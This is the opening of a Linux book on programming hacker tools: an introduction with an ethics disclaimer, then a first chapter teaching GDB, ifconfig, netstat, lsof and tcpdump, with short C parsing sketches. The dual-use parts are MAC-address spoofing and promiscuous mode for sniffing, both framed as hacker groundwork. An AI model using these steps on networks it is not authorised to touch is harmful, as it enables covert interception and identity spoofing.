Introduction


It is believed that a real hacker must create all necessary tools independently. If this opinion is to
be accepted as a postulate, this book is intended to make you a real hacker. This, however, was
not my goal in writing it. I wrote this book primarily for myself, to gain a better understanding of
how hacker tools of all types function and how they are programmed. By teaching others,
we enhance our existing familiarity with the subject and acquire new knowledge. I did not cover
all subjects in the book, but the information presented should be enough to allow you to handle
the omitted questions on your own.

Some may accuse me of teaching unethical and even illegal skills. My response is that the 
purpose behind this book is not to teach or advocate any type of destruction but to simply 
describe the technology available. How this technology is used is up to your moral standards. 
Even though I give working program examples in the book, all of them are practically useless 
against properly protected systems. Nevertheless, I want to give you the following instruction 
on using the programs considered in this book: 

Test all examples shown in the book only on your own system or hosts, on which you 
are expressly allowed to do this. Otherwise, you can create problems for those who work on 
the systems that you experiment on. 

Although all program examples are fully operational, they are written for training purposes;
to make the main concept stand out and the code easy to understand, I kept them
as simple as possible. Naturally, all source code authored by me is provided under the
GNU General Public License.

Even though some sticklers for details draw a clear-cut dividing line between hackers and
crackers, in this book I use both terms interchangeably to mean the latter type of computer
aficionado. Frankly, I don’t care about the big-endian versus little-endian (in the sense
other than byte order) squabbles concerning these terms, and I decided simply to use the term
“hacker” as the media use it. Nevertheless, I view a hacker primarily as someone who uses
intelligence and creative powers to develop programs solely to expand the horizons of personal
knowledge, and a cracker as someone who often uses other people’s developments for
personal gain or to inflict damage on others.

The program examples given in the book were developed for x86 platforms running under 
Linux. When possible, I tested programs for operability on two systems: Mandriva 2006 Power
Pack (the 2.6.12 kernel version) and Red Hat Linux (the 2.4.2 kernel version).

Each chapter addresses a specific subject matter, so you don’t have to read them in order 
like a textbook. 




Prerequisites for Understanding the Book's Material


For you to derive satisfaction and benefit from the book, you must already have certain 
knowledge. The following is a list of the subject areas you must have some knowledge of, 
in order of increasing difficulty, and corresponding suggested sources where such knowledge 
can be obtained: 




You must be able to use Linux at least at the level of a regular user. That is, you must be
able to use the Linux terminal and know basic terminal commands, such as ls, ps, who, man,
cat, su, cp, rm, grep, kill, and the like. You must know the organization of the Linux file
system and the access privilege system. You must be able to create and delete users.
You must know how to use one of the Linux editors, for example, vi. You must be able to
configure the network and Internet connection. In general, you must know enough to
work confidently with Linux. To this end, I advise that you acquire a thick Linux book for
beginners (such books are numerous nowadays) and read it from beginning to end, in the
process practicing your newly acquired knowledge on some Linux system.

Because most applications considered in this book are network applications, you must
have a clear idea of basic local and wide-area computer network principles. This means
you must know what network topologies exist and the differences among them, the open
systems interconnection (OSI) model layers, the TCP/IP protocol stack, the operation of
the main network protocols, the Ethernet standard, and the operating principles of different
communication devices, such as hubs, switches, and routers. I can recommend one
book [1] as a source for this information.

Almost all programs in the book are written in C; therefore, you must have a good working
knowledge of this programming language. I can recommend a great C textbook, written
by the creators of the language themselves [2].

Just having good knowledge of the C language is not enough to understand all the code in this
book. You must be able to program in C specifically for Linux: You must know all the fine
points of this operating system as applied to programming, know what standard Linux libraries
and functions are available and how to use them, and so on. In this respect, I can
recommend two great books. The first one is for beginners [3], and the second one is for
deeper study [4]. Advanced Linux Programming [4] can be downloaded as separate PDF
files from http://www.advancedlinuxprogramming.com.

As already mentioned, most code in this book deals with network applications; therefore,
you must know how to program network applications in a Linux environment. More specifically,
you should know how to use such fundamental network functions as socket(),
bind(), connect(), listen(), inet_aton(), htons(), sendto(), recvfrom(),
setsockopt(), and select(); such structures as sockaddr_in and sockaddr_ll; and
many other standard network programming elements. I assume that even if you don't
have any practical network programming experience, you have at least read some
good books on the subject and have a good theoretical grasp of it. Otherwise, I strongly
recommend that you study a classic work [5].


These prerequisites are far from all the knowledge you will need to understand a book as
all-embracing as this one. For example, the material in some chapters requires you to know
assembly language programming or programming of loadable kernel modules. Don't
worry: In the course of the book, I give the necessary elementary information and sources
from which more detailed information can be obtained.


The "Programming Hacker Tools Uncovered" Series 


This book is just the first in the “Programming Hacker Tools Uncovered” series. The next one 
will be Programming Windows Hacker Tools, which considers implementing the same software 
but for Windows. Don’t miss it! 


Contact 


You can get in touch with me by writing to one of these email addresses: 
sklyaroff@sklyaroff.ru, sklyaroff@mail.ru, or sklyarov@real.xakep.ru. 
You can also visit my personal Web site: www.sklyaroff.ru or www.sklyaroff.com. 







PART I: 
HACKER SOFTWARE 
DEVELOPER'S TOOLKIT 








Chapter 1: Main Tools 





Just like a locksmith, a programmer should have specialized tools. A locksmith could use just 
a file and a hammer for all his work, but a good lathe, a set of proper cutting bits, and a few 
other professional tools would allow him to do his job much faster, more efficiently, and with 
better quality. The same holds true for developing nonstandard hacker software: Specialized 
tools are a must for a proper job. So it is not by accident that I start the book with this chapter. 
Before you can start on your hacker adventures, you have to collect the proper tools and learn 
how to use them. This chapter is intended to help you with this task by providing information 
about the main standard utilities, those included in any complete Linux distribution. These 
tools are usually sufficient to solve most major programming problems. This information
is expanded in Chapter 2, which reviews additional utilities that can be used to
solve highly specialized problems.

You will not, however, find in these chapters any information about such basic utilities
as ps, who, man, and gcc. If you don’t know how to use these utilities, you are in over
your head with this book. Set it back on the shelf and first read the literature suggested in the
introduction.

I selected only the most important utilities for this book, those I used myself when 
developing programs for it. 

The only nonstandard software tool I would like to recommend is the VMware virtual
machine. This is a truly unique program that every hacker must have. You can purchase this
virtual machine for Linux or Windows at the developer's site (http://www.vmware.com).
A free demo version is also available. At first I wanted to devote a separate chapter to VMware,
but I changed my mind because doing this program justice would require a whole book.
VMware is quite easy to use, but to use its full capabilities you must have network administrator
skills. Because I have such skills, it was easy for me to set up a small local Ethernet network
on my computer, on which most network programs for this book were developed.


1.1. GNU Debugger 


GNU Debugger (GDB) is a standard console debugger for Linux and other UNIX-like systems. 
Although there are graphical interfaces for GDB, for example, the Data Display Debugger, 
I will not consider them because they are not standard Linux tools and are not popular in the 
UNIX world. 

There are three types of objects, called targets, that can be debugged using GDB: executable
files, memory dumps (core files), and processes. A core file contains an image of a process's
memory, usually produced as a result of the process's abnormal termination. There are various
ways to load each of these targets into GDB for debugging. First, any target can be loaded
from the command line when starting GDB. The following are the main ways of doing this:


- Loading an executable file into GDB:

# gdb program_name
# gdb -exec program_name
# gdb -e program_name

- Loading a memory dump file into GDB:

# gdb -core core_name
# gdb -c core_name
# gdb program_name core_name

In the last line, the first argument must be the name of the program that generated
the core file specified in the second argument.

- Attaching GDB to a running process:

# gdb -c process_pid
# gdb process_name process_pid

The process identifier (PID) of any process can be determined using the ps command.
Any type of target can also be loaded into an already-running GDB session:

- Loading an executable file:

(gdb) file program_name
(gdb) exec-file program_name

- Loading a dump file:

(gdb) core-file core_name

- Attaching to a process:

(gdb) attach process_pid
GDB can be detached from a process using the detach command. The detached process
continues executing in the system, and another process can then be attached.

When GDB is started, it outputs rather voluminous copyright information, which can be 
suppressed by invoking GDB with the -q option. 

To make debugging more convenient and efficient, you should compile your
programs with debugging information. This can be done by compiling them in GCC
(the GNU Compiler Collection) with the -g option. Debugging information allows you to
display variable and function names, line numbers, and other identifiers in GDB just as they
appeared in the program’s source code. If no debugging information is available, GDB will
work with the program at the machine instruction level.

When debugging a program, you will normally set one or more breakpoints in it. There are three types
of breakpoints:


- Regular breakpoints. With this type of breakpoint, the program stops when execution
reaches a certain address or function. Breakpoints are set using the break command or
its short form, b.¹ For example, the following command sets a breakpoint at the main()
function:

(gdb) break main

A breakpoint can also be set at any address; in this case, the address must be preceded
by an asterisk (*). You may need to set breakpoints at certain addresses in those parts
of your program for which there is no debugging information or source code. For example,
the following command sets a breakpoint at the address 0x801b7000:

(gdb) b *0x801b7000

- Watchpoints. The program stops when a certain variable is read or changed. There are
different types of watchpoints, each of which is set using a different command. The watch
command (wa for short) sets a watchpoint that stops the program when the value of
the specified variable changes:

(gdb) wa variable

The rwatch command (rw for short) sets a watchpoint that stops the program
when the value of the specified variable is read:

(gdb) rw variable

The awatch command (aw for short) sets a watchpoint that stops the program
when the value of the specified variable is read or written:

(gdb) aw variable

- Catchpoints. The program stops when a certain event takes place, for example, when a signal is
received. A catchpoint is set using the catch command as follows:

(gdb) catch event


¹ All main GDB commands have a long and a short form.
The program will stop when the specified event takes place. The following are some of the
events that a catchpoint can be set for:

throw: A C++ exception is thrown.

catch: A C++ exception is caught.

exec: The exec() function is called.

fork: The fork() function is called.

vfork: The vfork() function is called.

Information about catchpoint events can be obtained by executing the help catch command.
Unfortunately, many events are not supported in GDB.

Information about all set breakpoints can be obtained by executing the info breakpoints
command (i b for short). A breakpoint can be disabled using the disable command:

(gdb) disable b point_number

A disabled breakpoint can be activated using the enable command:

(gdb) enable b point_number

The number of a breakpoint, as well as its status (enabled or disabled), can be learned using
the info breakpoints command.

A breakpoint can be deleted using the delete command:

(gdb) delete breakpoint point_number

Alternatively, the short command version can be used:

(gdb) d b point_number

Executing the d command without arguments deletes all breakpoints.

When all preparations for debugging the program are completed, including setting breakpoints,
it can be launched using the run command (r for short). The program will execute
until it reaches a breakpoint. Execution of a stopped program can be resumed using the
continue command (c for short). You can trace program execution by stepping through its
source code lines using one of the tracing commands. The step N (s N for short) command
executes N lines of code, stepping into function calls, and the next N (n N for short) command
executes N lines of code, stepping over function calls. If N is not specified, a single line of
code is executed. The stepi N (si N) and nexti N (ni N) commands also trace program execution,
but they work with machine instructions rather than source code lines.
The finish (fin) command executes the program until the current function returns.

The print (p) command is used to output the value of an explicitly specified expression
(e.g., p 2+3), a variable value (e.g., p my_var), register contents (e.g., p $eax), or memory cell
contents (e.g., p *0x8018305). The x command is used to view the contents of memory cells.
The command’s format is as follows:


x/Nfu address 


Consider the elements of this command: 


- address: The address from which to start displaying memory (no asterisk is necessary
before the address).

- N: The number of memory units to display; the default value is 1.

- f: The output format. Can be one of the following: s, a null-terminated string; i, a machine
instruction; or x, hexadecimal format (the default).

- u: The memory unit. Can be one of the following: b, a byte; h, 2 bytes; w, 4 bytes (i.e.,
a word; the default memory unit); g, 8 bytes (i.e., a double word).


For example, the following command will output 20 hexadecimal words starting from
address 0x40057936:

(gdb) x/20xw 0x40057936


When the default Nfu values are used, the slash after the command is not needed.

The set command is used to modify the contents of registers or memory cells. For example,
the following command writes 1 to the ebx register:

(gdb) set $ebx = 1


The info registers (i r) command displays the contents of all registers. To view the 
contents of only certain registers, they must be specified immediately following the command. 
For example, the following command will display the contents of the ebp and eip registers: 

(gdb) i r ebp eip


The info share command displays information about the currently loaded shared libraries. 
The info frame, info args, and info local commands display the contents of the current stack 
frame, the function’s arguments, and the local variables, respectively. The backtrace (bt) command
displays the stack frame for each active subroutine. The debugger is exited by entering the
quit (q) command. Detailed information about a command can be obtained by executing the
help (h) command followed by the name of the command for which information is being sought.


1.2. Ifconfig


The ifconfig utility is used to configure network interfaces by changing such parameters as 
the Internet protocol (IP) address, the network mask, and the media access control (MAC) 
address. For programmers, the main usefulness of this utility is in the information it provides 
when executed with the -a switch. The following is an example of such output: 


# ifconfig -a

eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.130 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1443845 errors:0 dropped:0 overruns:0 frame:0
TX packets:3419238 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:10 Base address:0x10a4

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1447064 errors:0 dropped:0 overruns:0 frame:0
TX packets:1447064 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
The information about the eth0 Ethernet interface is output first, followed by the information
about the lo loopback interface. Executing ifconfig without any parameters will not
show the interfaces disabled with the down option (see the corresponding description later).

Some of the most important pieces of information output by the ifconfig -a command
are the following: the interface’s IP address (inet addr), the broadcast address (Bcast), the
network mask (Mask), the MAC address (HWaddr), and the maximum transmission unit (MTU)
in bytes. Also of interest are the numbers of successfully received and transmitted packets and
of erroneous, dropped, and overrun packets (RX packets, TX packets, errors, dropped, and
overruns, respectively). The collisions label shows the number of collisions in the network, and
the txqueuelen label shows the transmission queue length for the device. The Interrupt label
shows the hardware interrupt number used by the device.

To output data for only a specific interface, execute the command specifying the interface's
name:

# ifconfig eth0


The maximum transmission unit (MTU) of packets for an interface is set using the 
mtu N option: 
# ifconfig eth0 mtu 1000


The ifconfig utility will not let you specify an MTU larger than the maximum allowable
value, which is 1,500 bytes for Ethernet. The -arp option (with a minus sign) disables the
address resolution protocol (ARP) for the specified interface, and the arp option (without a
minus sign) enables it:

# ifconfig eth0 -arp
# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.130 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING NOARP MULTICAST MTU:1500 Metric:1


The promisc option (without a minus sign) enables promiscuous mode for the interface,
in which it accepts all packets it sees on the network, not only those addressed to it. This mode
is usually used by sniffers (see Chapter 9). The -promisc option (with a minus sign) disables
promiscuous mode:

# ifconfig eth0 promisc
# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.130 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1


An IP address is assigned to an interface using the inet option; a mask is assigned using 
the netmask option: 


# ifconfig eth0 inet 200.168.10.15 netmask 255.255.255.192
# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:200.168.10.15 Bcast:200.168.10.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
An interface can be disabled using the down option and enabled using the up option:

# ifconfig eth0 down
# ifconfig eth0 up


The hw class address option is used to change the hardware address (MAC address) of
an interface if the device's driver supports this capability. The device class name and the MAC
address string must be specified after the hw keyword. Currently, the ether (Ethernet), ax25
(AMPR AX.25), ARCnet, and netrom (AMPR NET/ROM) device classes are supported.
Before the hardware address can be changed, the interface must be disabled (see the down
option). The following is an example of changing the MAC address of the eth0 interface:

# ifconfig eth0 down
# ifconfig eth0 hw ether 13:13:13:13:13:13
# ifconfig eth0 up
# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 13:13:13:13:13:13
inet addr:192.168.10.130 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1


Using the ifconfig utility, an interface can be assigned multiple alias IP addresses, which, 
however, must pertain to the same network segment as the base address. The following is an 
example of assigning three IP addresses to a single interface, named eth0: 

# ifconfig eth0:0 192.168.10.200
# ifconfig eth0:1 192.168.10.201
# ifconfig eth0:2 192.168.10.202
# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.130 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1469698 errors:0 dropped:0 overruns:0 frame:0
TX packets:3440721 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:10 Base address:0x10a4

eth0:0 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.200 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:10 Base address:0x10a4

eth0:1 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.201 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:10 Base address:0x10a4

eth0:2 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC
inet addr:192.168.10.202 Bcast:192.168.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:10 Base address:0x10a4
Now the interface can be accessed using any of the four IP addresses it was assigned:
192.168.10.130, 192.168.10.200, 192.168.10.201, or 192.168.10.202. Administrators often use
this capability to create IP-based virtual Web hosts. An alias address can be deleted using
the down parameter as follows:

# ifconfig eth0:1 down


1.3. Netstat 


The netstat utility outputs various information about network operation. If called
without any parameters, it outputs information about established connections and supplementary
information about internal queues and files used for process interaction. By default,
listening ports are not included in the output. Both listening and nonlistening ports are
displayed using the -a parameter:

# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:1024 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 localhost.localdom:smtp *:* LISTEN
tcp 0 0 192.168.10.130:ssh 192.168.10.128:39806 ESTABLISHED
udp 0 0 *:1024 *:*
udp 0 0 *:686 *:*
udp 0 0 *:sunrpc *:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 1581 /dev/gpmctl
unix 2 [ ACC ] STREAM LISTENING 939 /var/run/pump.sock
unix 13 [ ] DGRAM 1178 /dev/log
unix 2 [ ACC ] STREAM LISTENING 1617 /tmp/.font-unix/fs7100
unix 2 [ ] DGRAM 690847
unix 2 [ ] DGRAM 252658
unix 2 [ ] DGRAM 12241
unix 2 [ ] DGRAM 1673
unix 2 [ ] DGRAM 1620
unix 2 [ ] DGRAM 1584
unix 2 [ ] DGRAM 1556
unix 2 [ ] DGRAM 1439
unix 2 [ ] DGRAM 1413
unix 2 [ ] DGRAM 1223
unix 2 [ ] DGRAM 1187
unix 2 [ ] STREAM CONNECTED 730


When domain name system (DNS) resolution is unavailable, netstat tries unsuccessfully to resolve
numerical addresses to host names and outputs information to the screen with long delays. Adding
the n flag prevents netstat from trying to resolve host names, thus speeding up the output:

# netstat -an 
In this case, all addresses are displayed in a numerical format.

As you can see in the preceding example, the information output by the netstat utility is
divided into two parts. The first part, named “active Internet connections,” lists all established
connections and listening ports. The Proto column shows the protocol used by a connection or
service: the transmission control protocol (TCP) or the user datagram protocol (UDP). The
Recv-Q and Send-Q columns show the number of bytes in the socket's receive and send queues,
respectively. The Local Address and Foreign Address columns show the local and remote
addresses. A local address that covers all interfaces is denoted by an asterisk; if the -n
parameter is specified, it is shown as 0.0.0.0. Addresses are shown in the host:service format,
where host is a computer name or an IP address and service is a port number or the name of a
standard service. (The mapping of port numbers to service names is given in the /etc/services
file.¹) The State column shows the connection’s state. The most common states are ESTABLISHED
(active connections), LISTEN (ports or services listening for connection requests; shown only
when the -a option is used), and TIME_WAIT (connections being closed).

Connection states are shown only for TCP, because UDP does not check connection status. 

Thus, the example output shows that most of the ports on the local node are listening and
only one active incoming secure shell (SSH) connection is established, from the remote address
192.168.10.128:39806.

The second part of the output, “active UNIX domain sockets,” shows the internal queues 
and files used in the process interaction. 

Using the -t option will output only the TCP ports: 

# netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:1024 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 192.168.10.130:22 192.168.10.128:58291 ESTABLISHED


Similarly, the -u parameter is used to output only the UDP ports: 


# netstat -uan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
udp 0 0 0.0.0.0:1024 0.0.0.0:*
udp 0 0 0.0.0.0:686 0.0.0.0:*
udp 0 0 0.0.0.0:111 0.0.0.0:*


The -i parameter is used to output information about the network interfaces: 


# netstat -i
Kernel Interface table
Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0 1500 0 1428232 0 0 0 3418346 0 0 0 BMRU
lo 16436 0 1446930 0 0 0 1446930 0 0 0 LRU

¹ In some UNIX versions, a period rather than a colon is used to separate the port number (service
name) from the computer name (IP address).


In many respects, this information is the same as the information produced by executing
the ifconfig -a command. Columns starting with RX (received) show the numbers of received
packets that were accepted successfully (OK), had errors (ERR), were dropped (DRP), or were lost
to overruns (OVR). Columns starting with TX (transmitted) show the same counters for sent packets.


The netstat utility can be used for real-time monitoring of network interfaces. Running
it with the -c parameter displays statistics at 1-second intervals:

# netstat -i -c


This mode can be used to trace sources of network errors. 
Running netstat with the -s parameter displays operation statistics for different network 
protocols: 
# netstat -s
Ip:
2669242 total packets received
2 with invalid headers
0 forwarded
37 incoming packets discarded
1489607 incoming packets delivered
4865030 requests sent out
38 fragments dropped after timeout
174870 reassemblies required
87357 packets reassembled ok
38 packet reassembles failed
193194 fragments created
Icmp:
478041 ICMP messages received
915 input ICMP message failed.
ICMP input histogram:
destination unreachable: 9559
timeout in transit: 74
echo requests: 177230
echo replies: 291178
177978 ICMP messages sent
0 ICMP messages failed


The -r parameter outputs the kernel routing table: 


# netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
192.168.10.0 * 255.255.255.0 U 40 0 0 eth0
127.0.0.0 * 255.0.0.0 U 40 0 0 lo


The -p parameter outputs information about processes associated with specific ports: 

# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:1024 0.0.0.0:* LISTEN 510/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 495/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 742/xinetd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 722/sshd
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 742/xinetd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 782/sendmail: accep
tcp 0 0 192.168.10.130:22 192.168.10.128:39806 ESTABLISHED 9899/sshd
udp 0 0 0.0.0.0:1024 0.0.0.0:* 510/rpc.statd
udp 0 0 0.0.0.0:686 0.0.0.0:* 510/rpc.statd
udp 0 0 192.168.10.130:1129 192.168.10.1:53 ESTABLISHED 10058/tcpdump
udp 0 0 0.0.0.0:111 0.0.0.0:* 495/portmap
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 1581 795/gpm /dev/gpmctl
unix 2 [ ACC ] STREAM LISTENING 939 415/pump /var/run/pump.sock
unix 13 [ ] DGRAM 1178 476/syslogd /dev/log
unix 2 [ ACC ] STREAM LISTENING 1617 853/xfs /tmp/.font-unix/fs7100
unix 2 [ ] DGRAM 690847 880/login -- root
unix 2 [ ] DGRAM 252658 742/xinetd
unix 2 [ ] DGRAM 12241 879/login -- root
unix 2 [ ] DGRAM 1673 878/login -- root
unix 2 [ ] DGRAM 1620 853/xfs
unix 2 [ ] DGRAM 1584 807/crond
unix 2 [ ] DGRAM 1556 782/sendmail: accep
unix 2 [ ] DGRAM 1439 695/automount
unix 2 [ ] DGRAM 1413 646/apmd
unix 2 [ ] DGRAM 1223 510/rpc.statd
unix 2 [ ] DGRAM 1187 461/klogd
unix 2 [ ] STREAM CONNECTED 730 1/init [3]


Compared with the output produced by the -a parameter, the -p parameter adds another
column, named PID/Program name, which shows the PID and the name of the program that owns
each socket. The netstat utility used in some UNIX versions does not have the -p parameter.
In this case, the function of this parameter is performed by the lsof utility.
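
On Linux, netstat typically reads this information from the /proc file system. Each TCP socket is one line of /proc/net/tcp. In that file, addresses and ports are printed in hexadecimal, the st column holds the connection state (0A means LISTEN), and the inode column identifies the socket. A process that owns the socket has an entry in /proc/PID/fd that points to socket:[inode], and matching these entries is how the PID/Program name column can be filled in. The sketch below parses one data line of /proc/net/tcp. The function name parse_proc_tcp_line is hypothetical, and the column layout is assumed from current Linux kernels.

```c
#include <stdio.h>

/* Parse one data line of /proc/net/tcp, returning the local port, the
 * state (0x0A = LISTEN), and the socket inode. Returns 0 on success and
 * -1 if the line (e.g., the header line) does not fit the layout. */
int parse_proc_tcp_line(const char *line, unsigned *local_port,
                        unsigned *state, unsigned long *inode)
{
    unsigned lport, st;
    unsigned long ino;
    /* sl: local_addr:port rem_addr:port st tx:rx tr:when retrnsmt uid timeout inode */
    int n = sscanf(line,
                   " %*d: %*X:%X %*X:%*X %X %*X:%*X %*X:%*X %*X %*u %*u %lu",
                   &lport, &st, &ino);
    if (n != 3)
        return -1;
    *local_port = lport;
    *state = st;
    *inode = ino;
    return 0;
}
```

Applied to a hypothetical line whose local address field is 00000000:0016, with state 0A and inode 1482, the function reports a socket listening on port 22 (0x16).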


1.4. Lsof 


The lsof utility is included with most modern Linux distributions. If you don’t have it
in your system, you can download it from this site:
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof.

The name lsof is a contraction of “list open files”; accordingly, when run without
parameters, it lists all open files, directories, libraries, UNIX streams, and open ports,
together with the processes that opened them. When run with the -i parameter, it lists only
open network ports and the processes that opened them. The following is an example of such output:


# lsof -i
COMMAND    PID USER   FD   TYPE DEVICE SIZE NODE NAME
portmap    495 root    3u  IPv4   1211       UDP  *:sunrpc
portmap    495 root    4u  IPv4   1212       TCP  *:sunrpc (LISTEN)
rpc.statd  510 root    4u  IPv4   1232       UDP  *:686
rpc.statd  510 root    5u  IPv4   1241       UDP  *:1024
rpc.statd  510 root    6u  IPv4   1244       TCP  *:1024 (LISTEN)
sshd       722 root    3u  IPv4   1482       TCP  *:ssh (LISTEN)
xinetd     742 root    3u  IPv4   1509       TCP  *:ftp (LISTEN)
xinetd     742 root    4u  IPv4   1510       TCP  *:telnet (LISTEN)
sendmail   782 root    4u  IPv4   1557       TCP  localhost.localdomain:smtp (LISTEN)


This output shows that the file transfer protocol (FTP) and telnet services are launched
by the xinetd superserver, whereas, for example, the simple mail transfer protocol (SMTP)
service is provided by the standalone sendmail daemon and, thus, cannot be disabled by editing
the /etc/xinetd.conf configuration file.

The utility can also output information for a specific service only: 


# lsof -i TCP:ftp
COMMAND    PID USER   FD   TYPE DEVICE SIZE NODE NAME
xinetd     742 root    3u  IPv4   1509       TCP  *:ftp (LISTEN)


1.5. Tcpdump 


The tcpdump utility is a network packet analyzer developed at the Lawrence Berkeley National
Laboratory. The official page for this utility is http://www.tcpdump.org. When I was develop-
ing the network examples for this book, tcpdump was running on my system practically all
the time.


1.5.1. Command Line Options 


If tcpdump is run without any parameters, it intercepts all network packets on the default
interface (the lowest-numbered active interface other than loopback) and displays their
header information. The -i parameter is used to specify the network interface to listen on:

# tcpdump -i eth0

To show only the packets received or sent by a specific host, specify the host’s name or IP
address after the host keyword:

# tcpdump host namesrv

Packets exchanged, for example, between the namesrv1 and the namesrv2 hosts can be
displayed using the following filter:

# tcpdump host namesrv1 and host namesrv2

They can also be displayed using a short version of it:

# tcpdump host namesrv1 and namesrv2

Only the outgoing packets from a certain node can be traced by running the utility with
the src host keywords:

# tcpdump src host namesrv


Incoming packets only can be traced using the dst host keywords:

# tcpdump dst host namesrv

The src port and dst port keywords are used to filter by the source port and the destination
port, respectively:

# tcpdump dst port 513

To trace only one of the three protocols, TCP, UDP, or the Internet control message
protocol (ICMP), simply specify its name in the command line. Filters of any degree of
complexity can be constructed using the Boolean operators and (&&), or (||), and not (!).
The following is an example of a filter that traces only ICMP packets arriving from an
external network:

# tcpdump icmp and not src net localnet

Specific bits or bytes in protocol headers can be tested using the proto[expr:size] format.
Here, proto specifies one of the following protocols: ether, fddi, tr, ip, arp, rarp, tcp,
udp, icmp, or ip6. The expr field specifies the offset in bytes from the start of that
protocol’s header, and size is an optional field specifying the number of bytes to examine
(1, 2, or 4; if omitted, only 1 byte is tested). For example, the following filter selects
only TCP segments in which SYN is the only flag set:

# tcpdump 'tcp[13] == 2'
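
A proto[expr:size] test reads size bytes at offset expr in network byte order and then compares the result. The C sketch below mirrors two SYN filters. The first is 'tcp[13] == 2', which matches only when SYN is the sole flag set. The second is 'tcp[13] & 2 != 0', which matches whenever SYN is set, regardless of the other flags. The names header_field, is_syn_only, and has_syn are hypothetical. The sketch assumes the buffer starts at the TCP header, as tcp[...] does in tcpdump. The flag constants are the standard bit positions in byte 13.

```c
#include <stddef.h>
#include <stdint.h>

/* Flag bits of byte 13 of the TCP header, least significant first. */
enum {
    FLAG_FIN = 0x01, FLAG_SYN = 0x02, FLAG_RST = 0x04,
    FLAG_PSH = 0x08, FLAG_ACK = 0x10, FLAG_URG = 0x20
};

/* Read a size-byte field (1, 2, or 4) at offset, big-endian, the way
 * proto[offset:size] is evaluated. Returns 0 if the field is out of range. */
uint32_t header_field(const uint8_t *hdr, size_t len, size_t offset, size_t size)
{
    uint32_t value = 0;
    if ((size != 1 && size != 2 && size != 4) || offset + size > len)
        return 0;
    for (size_t i = 0; i < size; i++)
        value = (value << 8) | hdr[offset + i];
    return value;
}

/* Same test as 'tcp[13] == 2': SYN is the only flag set. */
int is_syn_only(const uint8_t *tcp, size_t len)
{
    return header_field(tcp, len, 13, 1) == FLAG_SYN;
}

/* Same test as 'tcp[13] & 2 != 0': SYN set, other flags ignored. */
int has_syn(const uint8_t *tcp, size_t len)
{
    return (header_field(tcp, len, 13, 1) & FLAG_SYN) != 0;
}
```

A SYN/ACK segment (flag byte 0x12) therefore passes has_syn() but not is_syn_only().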

Concerning this filter: byte 13 of the TCP header contains the flag bits, and SYN is the
second bit counting from the least significant one (FIN is the first; see Section 3.4.4).
Because the SYN bit must be 1 and all the others 0, the flag byte in binary form is 00000010,
or 2 in decimal. The -c parameter can be used to specify the number of packets to receive.
For example, only 10 packets will be received by executing the following command:

# tcpdump -c 10 

The -a parameter instructs the utility to attempt to convert IP addresses to names (at the 
expense of the execution speed): 

# tcpdump -a

